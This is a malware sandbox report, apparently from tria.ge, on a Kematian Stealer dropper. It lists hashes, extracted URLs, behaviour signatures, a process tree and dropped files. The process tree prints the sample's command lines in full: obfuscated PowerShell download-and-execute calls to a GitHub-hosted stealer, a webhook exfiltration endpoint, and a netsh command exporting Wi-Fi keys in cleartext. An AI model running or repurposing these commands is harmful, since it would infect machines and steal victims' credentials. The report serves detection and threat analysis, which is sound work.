Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240709-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14/07/2024, 23:10

General

  • Target

    main (1).exe

  • Size

    89KB

  • MD5

    755ee27c14914293c29ce91be08c20df

  • SHA1

    cd4b0c9f25261d59689416734f9495a0c30bde17

  • SHA256

    f57315d9f70cab67669c23e10b081aac70f336369605d8c5e3079411f61e36de

  • SHA512

    a250ef4af67d0b5cb4d671ae72f689fcfc4704c0ce99768a7408e0824b1465f9e94e9027f8e6b2855bc0dfe4201deca85333809d34fad617e7ab411c7e10540c

  • SSDEEP

    1536:R97fbN3eEDhDPA/pICdUkbBtW7upvaLU0bI5taxKo0IOlnToIfBweOy:Rp7DhdC6kzWypvaQ0FxyNTBfBt

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://full-recording.gl.at.ply.gg:14817/data

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1

Signatures

  • Blocklisted process makes network request 10 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 4 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\main (1).exe
    "C:\Users\Admin\AppData\Local\Temp\main (1).exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3724
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd" /c "C:\Users\Admin\AppData\Local\Temp\7280.tmp\7281.tmp\7282.bat "C:\Users\Admin\AppData\Local\Temp\main (1).exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:4884
      • C:\Windows\system32\net.exe
        net session
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2600
        • C:\Windows\system32\net1.exe
          C:\Windows\system32\net1 session
          4⤵
            PID:3508
        • C:\Windows\system32\mshta.exe
          mshta vbscript:close(createobject("wscript.shell").run("powershell $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex",0))
          3⤵
          • Checks computer location settings
          • Suspicious use of WriteProcessMemory
          PID:456
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $ProgressPreference = 'SilentlyContinue';$webhook = 'h' + 'ttps://full-recording.gl.at.ply.gg:14817/data';$debug=$false;$vm_protect=$false;$encryption_key = 'YOUR_ENC_KEY_HERE';$blockhostsfile=$false;$criticalprocess=$false;$melt=$false;$fakeerror=$false;$persistence=$false;$write_disk_only = $false;$t = Iwr -Uri 'https://raw.githubusercontent.com/Somali-Devs/Kematian-Stealer/main/frontend-src/main.ps1' -USeB | iex
            4⤵
            • Blocklisted process makes network request
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1128
            • C:\Windows\system32\netsh.exe
              "C:\Windows\system32\netsh.exe" wlan export profile folder=C:\Users\Admin\AppData\Local\Temp\wifi key=clear
              5⤵
              • Event Triggered Execution: Netsh Helper DLL
              PID:3148
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/webcam.ps1'))
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:1412
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" I'E'X((New-Object Net.Webclient)."DowNloAdSTRiNg"('https://github.com/Somali-Devs/Kematian-Stealer/raw/main/frontend-src/kematian_shellcode.ps1'))
              5⤵
              • Blocklisted process makes network request
              • Suspicious behavior: EnumeratesProcesses
              PID:2256

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      2f57fde6b33e89a63cf0dfdd6e60a351

      SHA1

      445bf1b07223a04f8a159581a3d37d630273010f

      SHA256

      3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

      SHA512

      42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      1KB

      MD5

      abc27673d9c940ad74b41c58391d2412

      SHA1

      9a31a521a521dcd0f974ce6f7a50aecc69a50df0

      SHA256

      cb3f2adb2f5e39fbe5ae3c49837d9074a85f21e9be7eb8404444611f78a08357

      SHA512

      c7a574f9a53d29e2212500eb48fb05f475bac1e21b858f58e0e441caabea760ba7b7425a98610bf91e66d662f70a91c210b522bbecad3f5180e1aedbf6cfcdc4

    • C:\Users\Admin\AppData\Local\Temp\7280.tmp\7281.tmp\7282.bat

      Filesize

      707B

      MD5

      c11ddd77e6fd87bfd91da46629012670

      SHA1

      d72617510c45e258583ad25801c92b97152bb2b9

      SHA256

      243627dc5cc3254b95baeaa0fff9e11c377125a587788abf7aa408129550fef7

      SHA512

      8eca3612c655f7c1054a993525689f34ac7f777b357e0a2ec48f4786aaba345c594eb7a306630eaed6739e1bc970054b0db279adb7c143da87f19fcd7519d411

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_iqourtis.vun.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\downloads.json

      Filesize

      4B

      MD5

      37a6259cc0c1dae299a7866489dff0bd

      SHA1

      2be88ca4242c76e8253ac62474851065032d6833

      SHA256

      74234e98afe7498fb5daf1f36ac2d78acc339464f950703b8c019892f982b90b

      SHA512

      04f8ff2682604862e405bf88de102ed7710ac45c1205957625e4ee3e5f5a2241e453614acc451345b91bafc88f38804019c7492444595674e94e8cf4be53817f

    • C:\Users\Admin\AppData\Roaming\Kematian\GB-(FIPWTUZL)-(2024-07-14)-(UTC0)\DomainDetects\Edge.txt

      Filesize

      2B

      MD5

      81051bcc2cf1bedf378224b0a93e2877

      SHA1

      ba8ab5a0280b953aa97435ff8946cbcbb2755a27

      SHA256

      7eb70257593da06f682a3ddda54a9d260d4fc514f645237f5ca74b08f8da61a6

      SHA512

      1b302a2f1e624a5fb5ad94ddc4e5f8bfd74d26fa37512d0e5face303d8c40eee0d0ffa3649f5da43f439914d128166cb6c4774a7caa3b174d7535451eb697b5d

    • memory/1128-20-0x0000019DFFED0000-0x0000019DFFF46000-memory.dmp

      Filesize

      472KB

    • memory/1128-19-0x0000019DFFE00000-0x0000019DFFE44000-memory.dmp

      Filesize

      272KB

    • memory/1128-16-0x0000019DFFD60000-0x0000019DFFD84000-memory.dmp

      Filesize

      144KB

    • memory/1128-15-0x0000019DFFD60000-0x0000019DFFD8A000-memory.dmp

      Filesize

      168KB

    • memory/1128-14-0x0000019D82CA0000-0x0000019D831C8000-memory.dmp

      Filesize

      5.2MB

    • memory/1128-13-0x0000019E00000000-0x0000019E001C2000-memory.dmp

      Filesize

      1.8MB

    • memory/1128-65-0x0000019DE7890000-0x0000019DE78A2000-memory.dmp

      Filesize

      72KB

    • memory/1128-66-0x0000019DE77F0000-0x0000019DE77FA000-memory.dmp

      Filesize

      40KB

    • memory/1128-3-0x0000019DFFD30000-0x0000019DFFD52000-memory.dmp

      Filesize

      136KB

    • memory/1412-30-0x0000022FC9EB0000-0x0000022FC9EB8000-memory.dmp

      Filesize

      32KB

    • memory/2256-45-0x000002274FDD0000-0x00000227501A4000-memory.dmp

      Filesize

      3.8MB